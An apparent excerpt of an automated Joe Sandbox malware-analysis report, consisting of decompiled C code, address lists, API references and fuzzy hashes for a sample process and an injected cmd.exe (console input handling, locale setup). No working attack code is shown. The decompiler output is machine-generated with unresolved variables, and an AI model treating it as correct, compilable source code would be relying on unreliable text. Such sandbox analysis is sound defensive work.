				E004191E0(_t15, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t6 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}




                                    0x00418922
                                    0x0041892f
                                    0x00418933
                                    0x0041894a
                                    0x00418958

                                    APIs
                                    • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418958
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.763833040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_400000_Fp4grWelSC.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExitProcess
                                    • String ID:
                                    • API String ID: 621844428-0
                                    • Opcode ID: 4fb69927f300ce01bfdc89470c9170a077f6e3de3322b6d5ff6f01abe3f95379
                                    • Instruction ID: 70a77c489f3fd9436576a7529edcd1e9ce771395e4f518b155397fc3cc4fefed
                                    • Opcode Fuzzy Hash: 4fb69927f300ce01bfdc89470c9170a077f6e3de3322b6d5ff6f01abe3f95379
                                    • Instruction Fuzzy Hash: FEE04675600204BBE621DB65CC85EC37BA8AF48760F018258F9195B342C671AA00CAE1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00418930, Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E00418930(intOrPtr _a4, int _a8) {
				void* _t10;

				_t5 = _a4;
				E004191E0(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}




                                    0x00418933
                                    0x0041894a
                                    0x00418958

                                    APIs
                                    • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418958
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.763833040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_400000_Fp4grWelSC.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExitProcess
                                    • String ID:
                                    • API String ID: 621844428-0
                                    • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                    • Instruction ID: c6ffa8f41277cedcd146721b33de4ab2dd662f0a832426917f21051448e796de
                                    • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                    • Instruction Fuzzy Hash: 90D012716042147BD620DB99CC85FD7779CDF48790F018065FA1C5B241C531BA00C6E1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Non-executed Functions

                                    Analysis Process: cmd.exe PID: 7036 Parent PID: 3424 cmd.exeCOMMON

                                    Executed Functions

                                    Non-executed Functions

                                    Function 011F3506, Relevance: 65.1, APIs: 30, Strings: 7, Instructions: 353memoryCOMMONCrypto
                                    Download Yara Rule
                                    C-Code - Quality: 48%
                                    			E011F3506(void __ecx, signed int __edx, long _a4, DWORD* _a8) {
				signed int _v8;
				signed int _v16;
				struct _CONSOLE_SCREEN_BUFFER_INFO _v32;
				unsigned int _v36;
				intOrPtr _v40;
				unsigned int _v44;
				intOrPtr _v50;
				struct _CONSOLE_SCREEN_BUFFER_INFO _v56;
				signed int _v68;
				void* _v76;
				void* _v80;
				DWORD* _v84;
				long _v88;
				void* _v90;
				signed int _v92;
				int _v96;
				void* _v100;
				long _v108;
				signed int _v112;
				void* _v120;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t83;
				void* _t85;
				int _t86;
				int _t87;
				int _t93;
				signed int _t95;
				void* _t99;
				void* _t104;
				void* _t105;
				void _t106;
				void _t107;
				signed int _t108;
				void* _t118;
				void _t119;
				signed int _t133;
				signed int _t134;
				void* _t141;
				void* _t142;
				long _t143;
				void* _t147;
				signed char _t149;
				signed int _t152;
				void* _t156;
				signed int _t157;
				void* _t159;
				void* _t163;
				void* _t168;
				void* _t169;
				int _t170;
				void* _t177;
				void* _t178;
				void* _t181;
				void* _t182;
				void* _t184;
				void* _t185;
				DWORD* _t187;
				void* _t189;
				struct _COORD _t190;
				signed int _t191;
				signed int _t193;
				void* _t196;
				void* _t197;
				void* _t206;
				void* _t207;

				_t173 = __edx;
				_t193 = (_t191 & 0xfffffff8) - 0x54;
				_t83 =  *0x11fd0b4; // 0x2833377e
				_v8 = _t83 ^ _t193;
				_t187 = _a8;
				_t184 = __edx;
				_v56.dwCursorPosition = __ecx;
				_v80 = _t187;
				_t85 = GetStdHandle(0xfffffff5);
				_v76 = _t85;
				if(_t85 == 0xffffffff) {
					__imp___get_osfhandle(1);
					_v76 = _t85;
				}
				if( *0x1213cc9 == 0) {
					L66:
					__imp__AcquireSRWLockShared(0x1217f20);
					_t86 = ReadConsoleW(_v56.dwSize, _t184, _a4, _t187, 0);
					__imp__ReleaseSRWLockShared(0x1217f20);
					_t87 = _t86;
				} else {
					_t147 = 0x20;
					_t196 =  *0x11fd0d8 - _t147; // 0x20
					if(_t196 >= 0) {
						goto L66;
					} else {
						_t197 =  *0x11fd0d4 - _t147; // 0x20
						if(_t197 >= 0 || GetConsoleScreenBufferInfo(_t85,  &_v32) == 0) {
							goto L66;
						} else {
							_t149 =  *0x11fd0d8; // 0x20
							_t190 = _v32.dwCursorPosition;
							_t142 = 0;
							_t173 = 1 << _t149;
							asm("bts edx, eax");
							_v68 = _t190;
							_v56.wAttributes = 0x10;
							_v56.dwSize = 0;
							_v44 = 0;
							_v40 = 1;
							_v36 = 0;
							E011FB4DD( *0x11fd0d4 & 0x0000ffff);
							 *0x11fd580 = 0;
							 *0x11fd578 = 0;
							 *0x11fd574 = 0;
							 *0x11fd57c = 0;
							while(1) {
								L7:
								__imp__AcquireSRWLockShared(0x1217f20);
								_t93 = ReadConsoleW(_v56.dwSize, _t184, _a4, _v84,  &(_v56.dwCursorPosition));
								_v92 = _t93;
								__imp__ReleaseSRWLockShared(0x1217f20);
								_v68 =  *_v88;
								if( *0x11fd544 == 0) {
									_t95 = 0;
									__eflags = 0;
								} else {
									EnterCriticalSection( *0x1203858);
									 *0x11fd544 = 0;
									LeaveCriticalSection( *0x1203858);
									if(_t142 != 0) {
										RtlFreeHeap(GetProcessHeap(), 0, _t142);
									}
									_t95 = 0;
									_t142 = 0;
								}
								if(_v96 == 0) {
									break;
								}
								_t173 = _t173 | 0xffffffff;
								_v92 = _v92 | 0xffffffff;
								_v80 = _t95;
								if( *_v88 <= 0) {
									break;
								} else {
									while(1) {
										_t152 =  *(_t184 + _t95 * 2) & 0x0000ffff;
										if(_t152 == 0xd) {
											break;
										}
										_t206 = _t152 -  *0x11fd0d8; // 0x20
										if(_t206 == 0) {
											_v92 = _t95;
											goto L25;
										} else {
											_t207 = _t152 -  *0x11fd0d4; // 0x20
											if(_t207 == 0) {
												_v92 = _t95;
												_v80 = 1;
												L24:
												__eflags = _t173 - 0xffffffff;
												if(_t173 != 0xffffffff) {
													goto L18;
												} else {
													L25:
													__eflags = _t95 - 0xffffffff;
													if(_t95 == 0xffffffff) {
														goto L18;
													} else {
														 *_v88 = _t95;
														 *(_t184 + _t95 * 2) = 0;
														__eflags = _t142;
														if(_t142 == 0) {
															L35:
															_v96 = 1;
														} else {
															_t169 = _t142;
															_t133 = _t184;
															while(1) {
																_t181 =  *_t133;
																__eflags = _t181 -  *_t169;
																if(_t181 !=  *_t169) {
																	break;
																}
																__eflags = _t181;
																if(_t181 == 0) {
																	L32:
																	_t170 = 0;
																	_t134 = 0;
																} else {
																	_t182 =  *((intOrPtr*)(_t133 + 2));
																	__eflags = _t182 -  *((intOrPtr*)(_t169 + 2));
																	if(_t182 !=  *((intOrPtr*)(_t169 + 2))) {
																		break;
																	} else {
																		_t133 = _t133 + 4;
																		_t169 = _t169 + 4;
																		__eflags = _t182;
																		if(_t182 != 0) {
																			continue;
																		} else {
																			goto L32;
																		}
																	}
																}
																L34:
																_v96 = _t170;
																__eflags = _t134;
																if(_t134 != 0) {
																	goto L35;
																}
																goto L36;
															}
															asm("sbb eax, eax");
															_t134 = _t133 | 0x00000001;
															_t170 = 0;
															__eflags = 0;
															goto L34;
														}
														L36:
														_t99 = _v80;
														__eflags = _t99;
														if(__eflags == 0) {
															__eflags = _v92 - 2;
															if(__eflags > 0) {
																__imp___wcsnicmp(_t184, L"cd ", 3);
																_t193 = _t193 + 0xc;
																__eflags = _t99;
																if(__eflags == 0) {
																	L45:
																	_t99 = 1;
																} else {
																	__imp___wcsnicmp(_t184, L"rd ", 3);
																	_t193 = _t193 + 0xc;
																	__eflags = _t99;
																	if(__eflags == 0) {
																		goto L45;
																	} else {
																		__imp___wcsnicmp(_t184, L"md ", 3);
																		_t193 = _t193 + 0xc;
																		__eflags = _t99;
																		if(__eflags == 0) {
																			goto L45;
																		} else {
																			__imp___wcsnicmp(_t184, L"chdir ", 6);
																			_t193 = _t193 + 0xc;
																			__eflags = _t99;
																			if(__eflags == 0) {
																				goto L45;
																			} else {
																				__imp___wcsnicmp(_t184, L"rmdir ", 6);
																				_t193 = _t193 + 0xc;
																				__eflags = _t99;
																				if(__eflags == 0) {
																					goto L45;
																				} else {
																					__imp___wcsnicmp(_t184, L"mkdir ", 6);
																					_t193 = _t193 + 0xc;
																					__eflags = _t99;
																					if(__eflags == 0) {
																						goto L45;
																					} else {
																						__imp___wcsnicmp(_t184, L"pushd ", 6);
																						_t193 = _t193 + 0xc;
																						__eflags = _t99;
																						if(__eflags != 0) {
																							_t99 = _v80;
																						} else {
																							goto L45;
																						}
																					}
																				}
																			}
																		}
																	}
																}
															}
														}
														_push(_v96);
														_t155 = _t184;
														_push(_t99);
														_push( !(_v44 >> 4) & 0x00000001);
														_push(_v92);
														_t104 = E011FB2BF(_t142, _t184, _a4, _t184, _t190, __eflags);
														__eflags = _t104;
														if(_t104 == 0) {
															_t105 = E011E7797(_t155);
															__eflags = _t105;
															if(_t105 != 0) {
																 *0x121c014(0xffffffff);
															}
															_t156 = _t184;
															_t73 = _t156 + 2; // 0xc
															_t177 = _t73;
															do {
																_t106 =  *_t156;
																_t156 = _t156 + 2;
																__eflags = _t106 - _v80;
															} while (_t106 != _v80);
															_t157 = _t156 - _t177;
															__eflags = _t157;
															_v68 = _t157 >> 1;
														} else {
															E011F9897();
															_t118 = GetConsoleScreenBufferInfo(_v100,  &_v56);
															__eflags = _t118;
															if(_t118 != 0) {
																_t168 = _v50 - (_v92 + _v108) / _v56;
																__eflags = _t168;
																_v90 = _t168;
																_t190 = _v92;
															}
															_t163 = _t184;
															_t61 = _t163 + 2; // 0xc
															_t178 = _t61;
															do {
																_t119 =  *_t163;
																_t163 = _t163 + 2;
																__eflags = _t119 - _v80;
															} while (_t119 != _v80);
															_v88 = _t163 - _t178 >> 1;
															SetConsoleCursorPosition(_v100, _t190);
															_push( &_v84);
															_push(_t190);
															_push(_v84);
															_push(0x20);
															_push(_v100);
															FillConsoleOutputCharacterW();
															WriteConsoleW(_v120, _t184, _v108,  &_v108, 0);
															_v88 = _v108;
															E011E06C0(_t163 - _t178 >> 1);
														}
														__eflags = _t142;
														if(_t142 == 0) {
															_t143 = 0;
															__eflags = 0;
														} else {
															_t143 = 0;
															RtlFreeHeap(GetProcessHeap(), 0, _t142);
														}
														_t159 = _t184;
														_t76 = _t159 + 2; // 0xc
														_t173 = _t76;
														do {
															_t107 =  *_t159;
															_t159 = _t159 + 2;
															__eflags = _t107 - _t143;
														} while (_t107 != _t143);
														_t77 = (_t159 - _t173 >> 1) + 1; // 0x9
														_t108 = _t77;
														_v112 = _t108;
														_t142 = HeapAlloc(GetProcessHeap(), _t143, _t108 + _t108);
														__eflags = _t142;
														if(_t142 == 0) {
															_t87 = 0;
														} else {
															_t173 = _v112;
															E011E1040(_t142, _t173, _t184);
															goto L7;
														}
													}
												}
											} else {
												_t95 = _t95 + 1;
												if(_t95 <  *_v88) {
													continue;
												} else {
													goto L18;
												}
											}
										}
										goto L67;
									}
									_t173 = _t95;
									_t95 = _v92;
									goto L24;
								}
								goto L67;
							}
							L18:
							if(_t142 != 0) {
								RtlFreeHeap(GetProcessHeap(), 0, _t142);
							}
							_t87 = _v96;
						}
					}
				}
				L67:
				_pop(_t185);
				_pop(_t189);
				_pop(_t141);
				return E011E6FD0(_t87, _t141, _v16 ^ _t193, _t173, _t185, _t189);
			}







































































                                    0x011f3506
                                    0x011f350e
                                    0x011f3511
                                    0x011f3518
                                    0x011f351e
                                    0x011f3524
                                    0x011f3526
                                    0x011f352a
                                    0x011f352e
                                    0x011f3534
                                    0x011f353b
                                    0x011f353f
                                    0x011f3546
                                    0x011f3546
                                    0x011f3551
                                    0x011f3932
                                    0x011f3938
                                    0x011f3949
                                    0x011f3952
                                    0x011f3958
                                    0x011f3557
                                    0x011f3559
                                    0x011f355a
                                    0x011f3561
                                    0x00000000
                                    0x011f3567
                                    0x011f3567
                                    0x011f356e
                                    0x00000000
                                    0x011f3588
                                    0x011f3588
                                    0x011f3598
                                    0x011f359c
                                    0x011f359e
                                    0x011f35a0
                                    0x011f35a3
                                    0x011f35a7
                                    0x011f35af
                                    0x011f35b3
                                    0x011f35b7
                                    0x011f35bb
                                    0x011f35bf
                                    0x011f35c4
                                    0x011f35ca
                                    0x011f35d0
                                    0x011f35d6
                                    0x011f35dc
                                    0x011f35dc
                                    0x011f35e1
                                    0x011f35f8
                                    0x011f3603
                                    0x011f3607
                                    0x011f361a
                                    0x011f361e
                                    0x011f365a
                                    0x011f365a
                                    0x011f3620
                                    0x011f3626
                                    0x011f3634
                                    0x011f3639
                                    0x011f3641
                                    0x011f364e
                                    0x011f364e
                                    0x011f3654
                                    0x011f3656
                                    0x011f3656
                                    0x011f3661
                                    0x00000000
                                    0x00000000
                                    0x011f3667
                                    0x011f366a
                                    0x011f366f
                                    0x011f3676
                                    0x00000000
                                    0x011f3678
                                    0x011f3678
                                    0x011f3678
                                    0x011f367f
                                    0x00000000
                                    0x00000000
                                    0x011f3681
                                    0x011f3688
                                    0x011f36c8
                                    0x00000000
                                    0x011f368a
                                    0x011f368a
                                    0x011f3691
                                    0x011f36ba
                                    0x011f36be
                                    0x011f36d4
                                    0x011f36d4
                                    0x011f36d7
                                    0x00000000
                                    0x011f36d9
                                    0x011f36d9
                                    0x011f36d9
                                    0x011f36dc
                                    0x00000000
                                    0x011f36de
                                    0x011f36e2
                                    0x011f36e6
                                    0x011f36ea
                                    0x011f36ec
                                    0x011f3729
                                    0x011f3729
                                    0x011f36ee
                                    0x011f36ee
                                    0x011f36f0
                                    0x011f36f2
                                    0x011f36f2
                                    0x011f36f5
                                    0x011f36f8
                                    0x00000000
                                    0x00000000
                                    0x011f36fa
                                    0x011f36fd
                                    0x011f3714
                                    0x011f3714
                                    0x011f3716
                                    0x011f36ff
                                    0x011f36ff
                                    0x011f3703
                                    0x011f3707
                                    0x00000000
                                    0x011f3709
                                    0x011f3709
                                    0x011f370c
                                    0x011f370f
                                    0x011f3712
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011f3712
                                    0x011f3707
                                    0x011f3721
                                    0x011f3721
                                    0x011f3725
                                    0x011f3727
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011f3727
                                    0x011f371a
                                    0x011f371c
                                    0x011f371f
                                    0x011f371f
                                    0x00000000
                                    0x011f371f
                                    0x011f3731
                                    0x011f3731
                                    0x011f3735
                                    0x011f3737
                                    0x011f373d
                                    0x011f3742
                                    0x011f3750
                                    0x011f3756
                                    0x011f3759
                                    0x011f375b
                                    0x011f37db
                                    0x011f37dd
                                    0x011f375d
                                    0x011f3765
                                    0x011f376b
                                    0x011f376e
                                    0x011f3770
                                    0x00000000
                                    0x011f3772
                                    0x011f377a
                                    0x011f3780
                                    0x011f3783
                                    0x011f3785
                                    0x00000000
                                    0x011f3787
                                    0x011f378f
                                    0x011f3795
                                    0x011f3798
                                    0x011f379a
                                    0x00000000
                                    0x011f379c
                                    0x011f37a4
                                    0x011f37aa
                                    0x011f37ad
                                    0x011f37af
                                    0x00000000
                                    0x011f37b1
                                    0x011f37b9
                                    0x011f37bf
                                    0x011f37c2
                                    0x011f37c4
                                    0x00000000
                                    0x011f37c6
                                    0x011f37ce
                                    0x011f37d4
                                    0x011f37d7
                                    0x011f37d9
                                    0x011f37e0
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011f37d9
                                    0x011f37c4
                                    0x011f37af
                                    0x011f379a
                                    0x011f3785
                                    0x011f3770
                                    0x011f375b
                                    0x011f3742
                                    0x011f37e4
                                    0x011f37eb
                                    0x011f37ed
                                    0x011f37fa
                                    0x011f37fb
                                    0x011f37ff
                                    0x011f3804
                                    0x011f3806
                                    0x011f38a7
                                    0x011f38ac
                                    0x011f38ae
                                    0x011f38b2
                                    0x011f38b2
                                    0x011f38b8
                                    0x011f38ba
                                    0x011f38ba
                                    0x011f38bd
                                    0x011f38bd
                                    0x011f38c0
                                    0x011f38c3
                                    0x011f38c3
                                    0x011f38ca
                                    0x011f38ca
                                    0x011f38ce
                                    0x011f380c
                                    0x011f380c
                                    0x011f381a
                                    0x011f3820
                                    0x011f3822
                                    0x011f383b
                                    0x011f383b
                                    0x011f383d
                                    0x011f3842
                                    0x011f3842
                                    0x011f3846
                                    0x011f3848
                                    0x011f3848
                                    0x011f384b
                                    0x011f384b
                                    0x011f384e
                                    0x011f3851
                                    0x011f3851
                                    0x011f3861
                                    0x011f3865
                                    0x011f386f
                                    0x011f3870
                                    0x011f3871
                                    0x011f3875
                                    0x011f3877
                                    0x011f387b
                                    0x011f3892
                                    0x011f389c
                                    0x011f38a0
                                    0x011f38a0
                                    0x011f38d2
                                    0x011f38d4
                                    0x011f38e9
                                    0x011f38e9
                                    0x011f38d6
                                    0x011f38d7
                                    0x011f38e1
                                    0x011f38e1
                                    0x011f38eb
                                    0x011f38ed
                                    0x011f38ed
                                    0x011f38f0
                                    0x011f38f0
                                    0x011f38f3
                                    0x011f38f6
                                    0x011f38f6
                                    0x011f38ff
                                    0x011f38ff
                                    0x011f3902
                                    0x011f3917
                                    0x011f3919
                                    0x011f391b
                                    0x011f392e
                                    0x011f391d
                                    0x011f391d
                                    0x011f3924
                                    0x00000000
                                    0x011f3924
                                    0x011f391b
                                    0x011f36dc
                                    0x011f3693
                                    0x011f3697
                                    0x011f369a
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011f369a
                                    0x011f3691
                                    0x00000000
                                    0x011f3688
                                    0x011f36ce
                                    0x011f36d0
                                    0x00000000
                                    0x011f36d0
                                    0x00000000
                                    0x011f3676
                                    0x011f369c
                                    0x011f369e
                                    0x011f36ab
                                    0x011f36ab
                                    0x011f36b1
                                    0x011f36b1
                                    0x011f356e
                                    0x011f3561
                                    0x011f395a
                                    0x011f395e
                                    0x011f395f
                                    0x011f3960
                                    0x011f396b

                                    APIs
                                    • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5,0000000A,00000000,00000001), ref: 011F352E
                                    • _get_osfhandle.MSVCRT ref: 011F353F
                                    • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?), ref: 011F357A
                                    • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(01217F20), ref: 011F35E1
                                    • ReadConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,0000000A,?,?,00000010), ref: 011F35F8
                                    • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(01217F20), ref: 011F3607
                                    • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 011F3626
                                    • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 011F3639
                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000), ref: 011F3647
                                    • RtlFreeHeap.NTDLL(00000000), ref: 011F364E
                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000), ref: 011F36A4
                                    • RtlFreeHeap.NTDLL(00000000), ref: 011F36AB
                                    • _wcsnicmp.MSVCRT ref: 011F3750
                                    • _wcsnicmp.MSVCRT ref: 011F3765
                                    • _wcsnicmp.MSVCRT ref: 011F377A
                                    • _wcsnicmp.MSVCRT ref: 011F378F
                                    • _wcsnicmp.MSVCRT ref: 011F37A4
                                    • _wcsnicmp.MSVCRT ref: 011F37B9
                                    • _wcsnicmp.MSVCRT ref: 011F37CE
                                    • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,00000001,?), ref: 011F381A
                                    • SetConsoleCursorPosition.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?), ref: 011F3865
                                    • FillConsoleOutputCharacterW.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,00000020,?,?,?), ref: 011F387B
                                    • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,0000000A,?,?,00000000), ref: 011F3892
                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000), ref: 011F38DA
                                    • RtlFreeHeap.NTDLL(00000000), ref: 011F38E1
                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000009,?,?,?,00000001), ref: 011F390A
                                    • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 011F3911
                                    • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(01217F20), ref: 011F3938
                                    • ReadConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,0000000A,?,?,00000000), ref: 011F3949
                                    • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(01217F20), ref: 011F3952
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp Download File
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: Heap$Console_wcsnicmp$LockProcessShared$Free$AcquireBufferCriticalInfoReadReleaseScreenSection$AllocCharacterCursorEnterFillHandleLeaveOutputPositionWrite_get_osfhandle
                                    • String ID: cd $chdir $md $mkdir $pushd $rd $rmdir
                                    • API String ID: 2991647268-3100821235
                                    • Opcode ID: 2f843f7b86870d9b13edaa71d5c6646b396032770ff09ef04dea9e27c5d9d60b
                                    • Instruction ID: 45fd8c7e27964852de64885f15b11fef0f8a65f405dab691c5ca65f65186337c
                                    • Opcode Fuzzy Hash: 2f843f7b86870d9b13edaa71d5c6646b396032770ff09ef04dea9e27c5d9d60b
                                    • Instruction Fuzzy Hash: 53C1D671614301AFDB28DF68E89CA6B7BE5FF98714F04492DFA66C2294DB31C581CB12
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011E3F80, Relevance: 47.6, APIs: 15, Strings: 12, Instructions: 395COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 92%
                                    			E011E3F80() {
				signed int _v8;
				short _v264;
				void* __edi;
				void* __esi;
				signed int _t33;
				signed int _t75;
				signed int _t76;
				signed int _t77;
				signed int _t78;
				signed int _t79;
				signed int _t80;
				signed int _t81;
				signed int _t82;
				signed int _t83;
				signed int _t84;
				intOrPtr _t86;
				void* _t87;
				signed int _t89;
				signed int _t90;
				signed int _t91;
				void* _t92;
				short* _t93;
				short* _t94;
				short* _t95;
				short* _t96;
				short* _t97;
				short* _t98;
				short* _t99;
				short* _t100;
				short* _t101;
				short* _t102;
				short* _t103;
				intOrPtr* _t106;
				int _t107;
				int _t108;
				int _t109;
				int _t110;
				int _t111;
				int _t112;
				int _t113;
				int _t114;
				int _t115;
				int _t116;
				void* _t118;
				void* _t120;
				void* _t122;
				void* _t124;
				void* _t126;
				void* _t128;
				void* _t130;
				void* _t132;
				void* _t134;
				int _t136;
				signed int _t138;

				_t33 =  *0x11fd0b4; // 0x2833377e
				_v8 = _t33 ^ _t138;
				_t136 = E011E41A4();
				if(GetLocaleInfoW(_t136, 0x1e, 0x11ff81c, 8) == 0) {
					_t93 = 0x11ff81c;
					_t107 = 8;
					_t118 = ":" - 0x11ff81c;
					while(1) {
						_t11 = _t107 + 0x7ffffff6; // 0x7ffffffe
						if(_t11 == 0) {
							break;
						}
						_t91 =  *(_t118 + _t93) & 0x0000ffff;
						if(_t91 == 0) {
							break;
						}
						 *_t93 = _t91;
						_t93 =  &(_t93[1]);
						_t107 = _t107 - 1;
						if(_t107 != 0) {
							continue;
						}
						L33:
						_t93 = _t93 - 2;
						L34:
						 *_t93 = 0;
						goto L1;
					}
					if(_t107 != 0) {
						goto L34;
					}
					goto L33;
				}
				L1:
				if(GetLocaleInfoW(_t136, 0x23,  &_v264, 0x80) == 0) {
					L9:
					 *0x11fd540 = 0;
					if(GetLocaleInfoW(_t136, 0x21,  &_v264, 0x80) != 0) {
						_t86 = (_v264 & 0x0000ffff) - 0x30;
						if(_t86 != 0) {
							_t87 = _t86 - 1;
							if(_t87 == 0) {
								 *0x11fd540 = 1;
								 *0x11ff7f8 = L"dd/MM/yy";
							} else {
								if(_t87 == 1) {
									 *0x11fd540 = 2;
									 *0x11ff7f8 = L"yy/MM/dd";
								}
							}
						} else {
							 *0x11fd540 = _t86;
							 *0x11ff7f8 = L"MM/dd/yy";
						}
					}
					 *0x11ff620 = 2;
					if(GetLocaleInfoW(_t136, 0x24,  &_v264, 0x80) != 0 && _v264 == 0x31) {
						 *0x11ff620 = 4;
					}
					if(GetLocaleInfoW(_t136, 0x1d, 0x11ff80c, 8) == 0) {
						_t94 = 0x11ff80c;
						_t108 = 8;
						_t120 = "/" - 0x11ff80c;
						while(1) {
							_t13 = _t108 + 0x7ffffff6; // 0x7ffffffe
							if(_t13 == 0) {
								break;
							}
							_t84 =  *(_t120 + _t94) & 0x0000ffff;
							if(_t84 == 0) {
								break;
							}
							 *_t94 = _t84;
							_t94 =  &(_t94[1]);
							_t108 = _t108 - 1;
							if(_t108 != 0) {
								continue;
							}
							L45:
							_t94 = _t94 - 2;
							L46:
							 *_t94 = 0;
							goto L16;
						}
						if(_t108 != 0) {
							goto L46;
						}
						goto L45;
					} else {
						L16:
						if(GetLocaleInfoW(_t136, 0x31, 0x11ff7a8, 0x20) == 0) {
							_t95 = 0x11ff7a8;
							_t109 = 0x20;
							_t122 = L"Mon" - 0x11ff7a8;
							while(1) {
								_t15 = _t109 + 0x7fffffde; // 0x7ffffffe
								if(_t15 == 0) {
									break;
								}
								_t83 =  *(_t122 + _t95) & 0x0000ffff;
								if(_t83 == 0) {
									break;
								}
								 *_t95 = _t83;
								_t95 =  &(_t95[1]);
								_t109 = _t109 - 1;
								if(_t109 != 0) {
									continue;
								}
								L53:
								_t95 = _t95 - 2;
								L54:
								 *_t95 = 0;
								goto L17;
							}
							if(_t109 != 0) {
								goto L54;
							}
							goto L53;
						}
						L17:
						if(GetLocaleInfoW(_t136, 0x32, 0x11ff768, 0x20) == 0) {
							_t96 = 0x11ff768;
							_t110 = 0x20;
							_t124 = L"Tue" - 0x11ff768;
							while(1) {
								_t17 = _t110 + 0x7fffffde; // 0x7ffffffe
								if(_t17 == 0) {
									break;
								}
								_t82 =  *(_t124 + _t96) & 0x0000ffff;
								if(_t82 == 0) {
									break;
								}
								 *_t96 = _t82;
								_t96 =  &(_t96[1]);
								_t110 = _t110 - 1;
								if(_t110 != 0) {
									continue;
								}
								L61:
								_t96 = _t96 - 2;
								L62:
								 *_t96 = 0;
								goto L18;
							}
							if(_t110 != 0) {
								goto L62;
							}
							goto L61;
						}
						L18:
						if(GetLocaleInfoW(_t136, 0x33, 0x11ff728, 0x20) == 0) {
							_t97 = 0x11ff728;
							_t111 = 0x20;
							_t126 = L"Wed" - 0x11ff728;
							while(1) {
								_t19 = _t111 + 0x7fffffde; // 0x7ffffffe
								if(_t19 == 0) {
									break;
								}
								_t81 =  *(_t126 + _t97) & 0x0000ffff;
								if(_t81 == 0) {
									break;
								}
								 *_t97 = _t81;
								_t97 =  &(_t97[1]);
								_t111 = _t111 - 1;
								if(_t111 != 0) {
									continue;
								}
								L69:
								_t97 = _t97 - 2;
								L70:
								 *_t97 = 0;
								goto L19;
							}
							if(_t111 != 0) {
								goto L70;
							}
							goto L69;
						}
						L19:
						if(GetLocaleInfoW(_t136, 0x34, 0x11ff6e8, 0x20) == 0) {
							_t98 = 0x11ff6e8;
							_t112 = 0x20;
							_t128 = L"Thu" - 0x11ff6e8;
							while(1) {
								_t21 = _t112 + 0x7fffffde; // 0x7ffffffe
								if(_t21 == 0) {
									break;
								}
								_t80 =  *(_t128 + _t98) & 0x0000ffff;
								if(_t80 == 0) {
									break;
								}
								 *_t98 = _t80;
								_t98 =  &(_t98[1]);
								_t112 = _t112 - 1;
								if(_t112 != 0) {
									continue;
								}
								L77:
								_t98 = _t98 - 2;
								L78:
								 *_t98 = 0;
								goto L20;
							}
							if(_t112 != 0) {
								goto L78;
							}
							goto L77;
						}
						L20:
						if(GetLocaleInfoW(_t136, 0x35, 0x11ff6a8, 0x20) == 0) {
							_t99 = 0x11ff6a8;
							_t113 = 0x20;
							_t130 = L"Fri" - 0x11ff6a8;
							while(1) {
								_t23 = _t113 + 0x7fffffde; // 0x7ffffffe
								if(_t23 == 0) {
									break;
								}
								_t79 =  *(_t130 + _t99) & 0x0000ffff;
								if(_t79 == 0) {
									break;
								}
								 *_t99 = _t79;
								_t99 =  &(_t99[1]);
								_t113 = _t113 - 1;
